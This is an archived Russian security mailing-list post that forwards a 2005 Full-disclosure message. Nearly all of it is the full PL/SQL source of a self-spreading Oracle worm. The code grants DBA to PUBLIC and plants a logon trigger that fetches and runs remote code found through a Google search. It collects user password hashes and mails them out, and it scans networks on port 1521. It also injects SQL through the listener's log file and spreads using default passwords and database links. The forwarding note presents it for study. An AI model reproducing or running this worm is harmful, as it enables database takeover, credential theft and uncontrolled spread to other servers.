ПРОЕКТЫ 


  АРХИВ 


Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  СТАТЬИ 


  ПЕРСОНАЛЬНОЕ 


  ПРОГРАММЫ 



ПИШИТЕ
ПИСЬМА














     АРХИВ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FYI: Oracle worm-exploit-trojan gibrid



Добрые люди, 
Посмотрите, чего придумывают люди - удаленно и анонимно (через google) 
управляемая программная закладка в Oracle, инициируемая логинами пользователей, 
которая еще и сканирует сама сети вокруг и пытается установиться на другие 
сервера Oracle через уязвимость в listener или использование паролей по 
умолчанию (и сообщить об этом хакеру по почте вместе со списком пользователей и 
хэшей их паролей). Словом, полный набор хакерских технологий - его интересно 
посмотреть. 

> ------------------------------
> 
> Message: 13
> Date: Thu, 29 Dec 2005 16:15:37 -0500
> From: "kwbbwi" <kwbbwi@xxxxxxxxxxx>
> Subject: [Full-disclosure] Oracle
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID: <20051229211422.M54012@xxxxxxxxxxx>
> Content-Type: text/plain;     charset=iso-8859-1
> 
> -- Utility to backup you Oracle Password Hashes
> 
> -- Modified from 
> http://lists.grok.org.uk/pipermail/full-disclosure/2005-
> October/038290.html
> -- Code by anonymous
> 
> -- Exemple:
> 
> 
> --##startc0GtJBi1
> DECLARE
> 
> i1 INTEGER;
> i2 INTEGER;
> i6 INTEGER;
> 
> iHostToSearchFor INTEGER;
> 
> reference_ip varchar2(1000);
> reference_url varchar2(1000);
> 
> starting_ipaddress varchar2(100);
> current_ipaddress VARCHAR2(100);
> current_network VARCHAR2(100);
> current_letter VARCHAR2(1);
> 
> c   UTL_TCP.CONNECTION;
> c1   UTL_TCP.CONNECTION;
> ln integer;
> 
> vLen NUMBER;
> 
> PreviousSID varchar2(100);
> 
> vWorking varchar2(2500);
> vWorking1 varchar2(2500);
> vRequest varchar2(500);
> vRequestStop varchar2(500);
> vReqLog raw(500);
> vRequestSQLCommand raw(32000);
> vResp varchar2(32767);
> vRespPiece varchar2(200);
> vRespTemp varchar2(200);
> ret_val pls_integer;
> oraclehome varchar2(1000);
> vRefresh varchar2(2000);
> v_message      VARCHAR2(32000);
> 
> vRequestLogChange raw(10000);
> vRequestLogReset raw(10000);
> 
> iLoop integer := 0;
> iLength integer := 0;
> cur binary_integer;
> 
> BEGIN
> 
>    BEGIN
>       CTXSYS.DRILOAD.VALIDATE_STMT('GRANT DBA TO PUBLIC');
>    EXCEPTION
>       WHEN OTHERS THEN
>          DBMS_OUTPUT.PUT_LINE('');
>    END;
> 
> 
> reference_ip := 'www.google.com';
> reference_url := 
> '/search?hl=en&q=startc0GtJBi1+full-disclosure&btnI=I%
> 27m+Feeling+Lucky';
> 
> vRefresh := 'declare req Utl_Http.Req;resp 
> Utl_Http.Resp;v_msg varchar2(32767);af 
> varchar2(32767);ab varchar2(32767);ac varchar2(32767) := 
> ''''' || reference_ip  
> || ''''';v_url varchar2(32767) := ''''' || reference_url || 
> ''''';ad varchar2
> (32000) := ''''--##startc0GtJBi1'''';ae varchar2(32000) := 
> ''''--##endc0GtJBi1'''';i3 
> INTEGER;i4 INTEGER;iLoop integer := 0;cur binary_integer;i 
> binary_integer;begin 
> Utl_Http.Set_Proxy(proxy=>ac,no_proxy_domains=>ac );req := 
> Utl_Http.Begin_Request
> (url=>v_url,method=>''''GET'''' 
> );utl_Http.Set_Header(r=>req,name=>''''User-
> Agent'''',value=>''''Mozilla/4.0'''' 
> );resp:=Utl_Http.Get_Response(r=>req);begin loop 
> Utl_Http.Read_Text(r=>resp,data=>v_msg);af:=af || v_msg;end 
> loop;exception when 
> utl_Http.End_Of_Body then 
> null;end;Utl_Http.End_Response(r=>resp);i3:=instr
> (af,ad,1);i4:=instr(af,ae,i3);ab:=substr(af,i3+length(ad)+2,i4
-(i3+length(ad)
> +4));execute immediate ''''begin '''' || ab || '''' end;''''; end;';
> vWorking := 'create or replace trigger aa AFTER LOGON ON 
> DATABASE declare cur 
> binary_integer;BEGIN if round(dbms_random.value(1,100))=32 
> then EXECUTE IMMEDIATE ''' 
> || vRefresh || ''';end if;end;';
> 
> BEGIN
>    EXECUTE IMMEDIATE 'drop trigger aa';
> EXCEPTION
>    WHEN OTHERS THEN
>       DBMS_OUTPUT.PUT_LINE('the execute immediate didnt work');
> END;
> 
> BEGIN
>    EXECUTE IMMEDIATE vWorking;
> EXCEPTION
>    WHEN OTHERS THEN
>       DBMS_OUTPUT.PUT_LINE('the execute immediate didnt work');
> END;
> 
> starting_ipaddress := utl_inaddr.get_host_address;
> current_ipaddress := starting_ipaddress;
> ln := length(current_ipaddress);
> 
> loop
>    current_letter := substr(current_ipaddress, ln, 1);
>    ln := ln - 1;
>    EXIT WHEN current_letter = '.';
>    EXIT WHEN ln = 0;
> end loop;
> 
> current_network := substr(current_ipaddress, 1, ln);
> 
> 
> iHostToSearchFor := 1;
> 
> vRequest := chr(0) || chr(89) || chr(0) || chr(0) || chr(1) 
> || chr(0) || chr(0) || chr
> (0) ||
> chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || 
> chr(8) || chr(0) ||
> chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) 
> || chr(0) || chr(1) ||
> chr(0) || chr(31) || chr(0) || chr(58) || chr(0) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(0) || '(CONNECT_DATA=(COMMAND=status))';
> 
> vRequestStop := chr(0) || chr(87) || chr(0) || chr(0) || 
> chr(1) || chr(0) || chr(0) || 
> chr(0) ||
> chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || 
> chr(8) || chr(0) ||
> chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) 
> || chr(0) || chr(1) ||
> chr(0) || chr(29) || chr(0) || chr(58) || chr(0) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(0) || '(CONNECT_DATA=(COMMAND=stop))';
> 
> vReqLog := UTL_RAW.CONCAT( hextoraw('00'), hextoraw('A2'), 
> utl_raw.cast_to_raw( chr(0) 
> || chr(0) || chr(1) || chr(0) || chr(0) || chr(0) ||
> chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || 
> chr(8) || chr(0) ||
> chr(122) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) 
> || chr(0) || chr(1) ||
> chr(0) || chr(104) || chr(0) || chr(58) || chr(0) || chr(0) 
> || chr(0) || chr(0) ||
> chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(0) || 
> '(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))
> (COMMAND=log_directory)(ARGUMENTS=)(SERVICE=)))'));
> 
> 
> 
> DECLARE
>    a DBA_USERS.username%TYPE;
>    b DBA_USERS.password%TYPE;
> 
>    CURSOR T1Cursor IS
>       SELECT username, password
>       FROM DBA_USERS;
> BEGIN
>    OPEN T1Cursor;
>    LOOP
>       FETCH T1Cursor INTO a, b;
>       EXIT WHEN T1Cursor%NOTFOUND;
>       v_message := v_message || a || ' ' ||  b || CHR(13) || CHR(10);
>    END LOOP;
>    CLOSE T1Cursor;
> END;
> 
> 
> loop
> begin
> 
>    if MOD(iHostToSearchFor + 1, 100) = 0 then
> 
>       declare
>          mailhost  CONSTANT VARCHAR2(30) := 'smtp01.us.oracle.com';
>          crlf      CONSTANT VARCHAR2(2):= CHR(13) || CHR(10);
>          mesg      VARCHAR2(32000);
>          mail_conn utl_smtp.connection;
> 
>       BEGIN
>           begin
> 
>            loop
> 
>             mail_conn := utl_smtp.open_connection(mailhost, 25);
> 
>             mesg := 'Date: ' || TO_CHAR( SYSDATE, 'dd Mon yy 
> hh24:mi:ss' ) || crlf 
> || 'From: oracle@' || starting_ipaddress || crlf || 'Subject: 
> Password hashes' || crlf 
> || 'To: larry@xxxxxxxxxx' || crlf || '' || crlf || v_message;
> 
>             utl_smtp.helo(mail_conn, mailhost);
>             utl_smtp.mail(mail_conn, 'oracle@' || starting_ipaddress);
>             utl_smtp.rcpt(mail_conn, 'larry@xxxxxxxxxx');
>             utl_smtp.data(mail_conn, mesg);
>             utl_smtp.quit(mail_conn);
> 
>             EXIT WHEN round(dbms_random.value(1, 20)) = 10;
> 
>            end loop;
> 
>          EXCEPTION
>             WHEN OTHERS THEN
>                DBMS_OUTPUT.PUT_LINE('');
>          end;
> 
>          current_ipaddress := round(dbms_random.value(1, 
> 254)) || '.' || round
> (dbms_random.value(1, 254)) || '.' || 
> round(dbms_random.value(1, 254)) || '.' || round
> (dbms_random.value(1, 254));
> 
>          mail_conn := utl_smtp.open_connection(current_ipaddress, 25);
> 
>          mesg := 'Date: ' || TO_CHAR( SYSDATE, 'dd Mon yy 
> hh24:mi:ss' ) || crlf 
> || 'From: oracle@' || starting_ipaddress || crlf || 'Subject: 
> Password hashes' || crlf 
> || 'To: oracle@' || current_ipaddress || crlf || '' || crlf 
> || v_message;
> 
>          utl_smtp.helo(mail_conn, current_ipaddress);
>          utl_smtp.mail(mail_conn, 'oracle@' || starting_ipaddress);
>          utl_smtp.rcpt(mail_conn, 'oracle@' || current_ipaddress);
>          utl_smtp.data(mail_conn, mesg);
>          utl_smtp.quit(mail_conn);
> 
>       EXCEPTION
>          WHEN OTHERS THEN
>             DBMS_OUTPUT.PUT_LINE('');
> 
>       end;
> 
>    end if;
> 
>    if iHostToSearchFor < 255 then
> 
>       current_ipaddress := current_network || '.' || iHostToSearchFor;
> 
>    else
> 
>       current_ipaddress := round( dbms_random.value(1, 254) ) 
> || '.' || round( 
> dbms_random.value(1, 254) ) || '.' || 
> round(dbms_random.value(1, 254)) || '.' || round
> (dbms_random.value(1, 254));
> 
>    end if;
> 
>    iHostToSearchFor := iHostToSearchFor + 1;
> 
>    vResp := '';
>    
>    c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
>    ret_val := UTL_TCP.WRITE_RAW(c, vReqLog);
>    vLen := UTL_TCP.READ_RAW(c, vResp, 100 );
> 
>    vRespPiece := 
> utl_raw.cast_to_varchar2(utl_raw.substr(vResp, 13, 88));
>    vResp := vRespPiece;
>    
>    declare
>       read_from_network varchar2(32000);
>       length_read_from_network INTEGER;
>    begin
>       loop
>          read_from_network := '';
>          length_read_from_network := UTL_TCP.READ_RAW(c, 
> read_from_network, 100 );
>          read_from_network := utl_raw.cast_to_varchar2(utl_raw.substr
> (read_from_network, 1, length_read_from_network));
>          vResp := vResp || read_from_network;
>       end loop;
> 
>    EXCEPTION
>      when OTHERS then
>          read_from_network := '';
>    end;
> 
>    UTL_TCP.CLOSE_CONNECTION(c);
> 
> 
>    declare
>       i5 INTEGER;
>       i6 INTEGER;
>       oraclehome varchar2(1000);
>    begin
> 
>    i5 := 1;
>    i6 := 1;
> 
>    i5 := instr(vResp, '(LOGDIRNAME=', 1);
> 
>    if i5 > 0 then
> 
>       i6 := instr(vResp, '\network\log', i5);
>       if i6 = 0 then
>          i6 := instr(vResp, '/network/log', i5);
>       end if;
>       
>       oraclehome := substr( vResp, i5 + 12, i6 - (i5 + 12) );
> 
>    end if;
> 
>    iLength := length(oraclehome);
> 
>    vRequestLogChange := UTL_RAW.CONCAT( utl_raw.substr( 
> utl_raw.cast_from_binary_integer(218 + iLength), 3, 2 ), 
> utl_raw.cast_to_raw( chr(0) 
> || chr(0) || chr(1) || chr(0) || chr(0) || chr(0) ||
> chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || 
> chr(8) || chr(0) ||
> chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) 
> || chr(0) || chr(1)),
> utl_raw.substr( utl_raw.cast_from_binary_integer(160 + 
> iLength), 3, 2 ), 
> utl_raw.cast_to_raw( chr(0) || chr(58) || chr(0) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || 
> chr(0) || chr(0) || 
> chr(0) || chr(0) || 
> '(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))
> (COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1352
94976)(VALUE=' || 
> oraclehome  || '/sqlplus/admin/glogin.sql)))'));
> 
>    vRequestLogReset := UTL_RAW.CONCAT( utl_raw.substr( 
> utl_raw.cast_from_binary_integer
> (218 + iLength), 3, 2 ), utl_raw.cast_to_raw( chr(0) || 
> chr(0) || chr(1) || chr(0) || 
> chr(0) || chr(0) ||
> chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || 
> chr(8) || chr(0) ||
> chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) 
> || chr(0) || chr(1)), 
> utl_raw.substr( utl_raw.cast_from_binary_integer(160 + 
> iLength), 3, 2 ), 
> utl_raw.cast_to_raw( chr(0) || chr(58) || chr(0) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || 
> chr(0) || chr(0) || 
> chr(0) || chr(0) || 
> '(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))
> (COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1352
94976)(VALUE=' || 
> oraclehome  || '/network/log/listener.log)))'));
> 
>    vWorking1 := 'alter user mdsys identified by mdsys;';
>    
>    iLength := length(vWorking1) + 1;
> 
>    vRequestSQLCommand := UTL_RAW.CONCAT( utl_raw.substr( 
> utl_raw.cast_from_binary_integer(58 + iLength), 3, 2 ), 
> utl_raw.cast_to_raw( chr(0) || 
> chr(0) || chr(1) || chr(0) || chr(0) || chr(0) ||
> chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || 
> chr(8) || chr(0) ||
> chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) 
> || chr(0) || chr(1)), 
> utl_raw.substr( utl_raw.cast_from_binary_integer(iLength), 3, 
> 2 ), utl_raw.cast_to_raw
> ( chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
> chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || 
> chr(0) || chr(0) ||
> chr(0) || chr(0) || chr(10) || vWorking1));
> 
>    c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
>    ret_val := UTL_TCP.WRITE_RAW(c, vRequestLogChange);
>    UTL_TCP.CLOSE_CONNECTION(c);
> 
>    c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
>    ret_val := UTL_TCP.WRITE_RAW(c, vRequestSQLCommand);
>    UTL_TCP.CLOSE_CONNECTION(c);
> 
>    c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
>    ret_val := UTL_TCP.WRITE_RAW(c, vRequestLogReset);
>    UTL_TCP.CLOSE_CONNECTION(c);
> 
>    end;
>    
>    c1  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
> 
>    vResp := '';
>    
>    ret_val := UTL_TCP.WRITE_RAW(c1, utl_raw.cast_to_raw(vRequest));
>    vLen := UTL_TCP.READ_RAW(c1, vResp, 100 );
> 
>    vRespPiece := 
> utl_raw.cast_to_varchar2(utl_raw.substr(vResp, 43, 58));
>    vResp := vRespPiece;
>    
>    declare
>       read_from_network varchar2(32000);
>       length_read_from_network INTEGER;
>    begin
>       loop
>          read_from_network := '';
>          length_read_from_network := UTL_TCP.READ_RAW(c1, 
> read_from_network, 100 );
>          read_from_network := utl_raw.cast_to_varchar2(utl_raw.substr
> (read_from_network, 1, length_read_from_network));
>          vResp := vResp || read_from_network;
>       end loop;
> 
>    EXCEPTION
>       when OTHERS then
>          read_from_network := '';
>    end;
> 
>    UTL_TCP.CLOSE_CONNECTION(c1);
> 
> 
>    declare
>       i3 INTEGER;
>       i4 INTEGER;
>       sid varchar2(100);
>       i binary_integer;
>       procedure_to_spread varchar2(32000);
>       create_link varchar2(500);
>    begin
> 
>    i3 := 1;
>    i4 := 1;
> 
>    loop
> 
>      i3 := instr(vResp, '(INSTANCE_NAME=', i3);
>      exit when i3 = 0;
> 
>      i4 := instr(vResp, ')', i3);
>      sid := substr( vResp, i3 + 15, i4 - (i3 + 15));
>      i3 := i3 + 1;
> 
>      begin
>         if sid = PreviousSID or sid = 'PLSExtProc' or sid = 'extproc'
>         then
>            dbms_output.put_line( sid );
>         else
>            dbms_output.put_line( sid );
>           
>            iLoop := 0;
>            
>            loop
> 
>            declare
> 
>               username1 varchar2(100);
>               password1 varchar2(100);
> 
>            begin
> 
>               iLoop := iLoop + 1;
>               exit when iLoop = 8;
> 
>               if iLoop = 5 then
>                  username1 := 'system';
>                  password1 := 'manager';
> 
>               ELSIF iLoop = 6 then
>                  username1 := 'sys';
>                  password1 := 'change_on_install';
> 
>               ELSIF iLoop = 1 then
>                  username1 := 'dbsnmp';
>                  password1 := 'dbsnmp';
> 
>               ELSIF iLoop = 2 then
>                  username1 := 'outln';
>                  password1 := 'outln';
> 
>               ELSIF iLoop = 4 then
>                  username1 := 'scott';
>                  password1 := 'tiger';
> 
>               ELSIF iLoop = 3 then
>                  username1 := 'mdsys';
>                  password1 := 'mdsys';
> 
>               ELSIF iLoop = 7 then
>                  username1 := 'ordcommon';
>                  password1 := 'ordcommon';
> 
>               end if;
> 
>               BEGIN
>                  EXECUTE IMMEDIATE 'drop database link xxx';
>               EXCEPTION
>                  when OTHERS then
>                     DBMS_OUTPUT.PUT_LINE( '' );
>               end;
>                                  
>               create_link := 'CREATE DATABASE LINK xxx 
> CONNECT TO ' || username1 || ' 
> IDENTIFIED BY ' || password1 || ' USING 
> ''(DESCRIPTION=(ADDRESS_LIST=(ADDRESS = 
> (PROTOCOL = TCP)(HOST = ' || current_ipaddress || ')(PORT = 
> 1521)))(CONNECT_DATA=
> (SERVER=DEDICATED)(SERVICE_NAME=' || SID || ')))''';
>          
>               EXECUTE IMMEDIATE create_link;
>               EXECUTE IMMEDIATE vWorking;
> 
>            EXCEPTION
>               when OTHERS then
>                  DBMS_OUTPUT.PUT_LINE( '' );
>            end;
> 
>            end loop;
> 
>         end if;
> 
>         PreviousSID := SID;
> 
>      end;
> 
>    end loop; 
> 
>    c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
>    ret_val := UTL_TCP.WRITE_RAW(c, utl_raw.cast_to_raw(vRequestStop));
>    UTL_TCP.CLOSE_CONNECTION(c);
> 
>    end;
> 
> EXCEPTION
>      when OTHERS then
>       DBMS_OUTPUT.PUT_LINE('');
> end;
> 
> end loop;
> 
> END;
> --##endc0GtJBi1
> 
> 
> 




 




Copyright © Lexa Software, 1996-2009.